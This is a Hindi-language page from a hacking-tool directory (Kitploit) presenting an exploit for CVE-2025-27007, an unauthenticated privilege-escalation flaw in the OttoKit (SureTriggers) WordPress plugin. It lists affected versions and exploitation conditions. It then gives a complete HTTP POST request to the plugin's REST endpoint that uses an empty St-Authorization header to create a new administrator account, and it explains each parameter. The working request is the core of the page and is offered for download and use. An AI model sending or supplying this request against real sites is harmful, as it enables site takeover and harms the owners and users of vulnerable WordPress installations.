Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/absholi7ly/cve-2025-27007-ottokit-exploit
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubabsholi7ly/cve-2025-27007-ottokit-exploit

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-27007-OttoKit-exploit

CVE-2025-27007 का शोषण, ओटोकिट (पूर्व में SureTriggers) वर्डप्रेस प्लगइन में एक गंभीर अप्रमाणित विशेषाधिकार वृद्धि भेद्यता

रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

CVE-2025-27007: OttoKit (SureTriggers) विशेषाधिकार वृद्धि भेद्यता

CVE-2025-27007 का शोषण, WordPress के लिए OttoKit प्लगइन (पहले SureTriggers के नाम से जाना जाता था) में अनधिकृत विशेषाधिकार वृद्धि की एक गंभीर भेद्यता है। यह रिपॉजिटरी बताती है कि कैसे एक हमलावर एक असुरक्षित WordPress साइट पर व्यवस्थापक खाता बना सकता है।

प्रभावित संस्करण

  • OttoKit (SureTriggers) के सभी संस्करण ≤ 1.0.82।
  • संस्करण 1.0.83 में ठीक किया गया।

शोषण की शर्तें

भेद्यता का शोषण निम्नलिखित परिस्थितियों में किया जा सकता है:

  1. लक्ष्य WordPress साइट पर OttoKit स्थापित और सक्रिय होना चाहिए।
  2. प्लगइन अप्रारंभित हो (जैसे, डेटाबेस में कोई API कुंजी या "secret_key" सेट न हो)।
  3. लक्ष्य साइट REST API एंडपॉइंट '/wp-json/sure-triggers/v1/automation/action' प्रदर्शित करती हो।

HTTP अनुरोध

निम्नलिखित अनुरोध /wp-json/sure-triggers/v1/automation/action एंडपॉइंट को लक्षित करता है ताकि एक व्यवस्थापक खाता बनाया जा सके:

root@kitploit:~
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization: 
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists


अनुरोध की व्याख्या

  • एंडपॉइंट: POST /wp-json/sure-triggers/v1/automation/action
  • St-Authorization: (खाली): जब प्लगइन कॉन्फ़िगर नहीं किया गया हो तो प्रमाणीकरण को बायपास करता है।
  • selected_options[user_name]: नए खाते का उपयोगकर्ता नाम (जैसे, new_admin)।
  • selected_options[user_email]: नए खाते का ईमेल (जैसे, [email protected])।
  • selected_options[password]: नए खाते का पासवर्ड (जैसे, StrongP@ssw0rd123)।
  • selected_options[role]: पूर्ण विशेषाधिकार प्रदान करने के लिए administrator पर सेट करें।
  • type_event: उपयोगकर्ता निर्माण को ट्रिगर करने के लिए create_user_if_not_exists पर सेट करें।
टूल डाउनलोड करें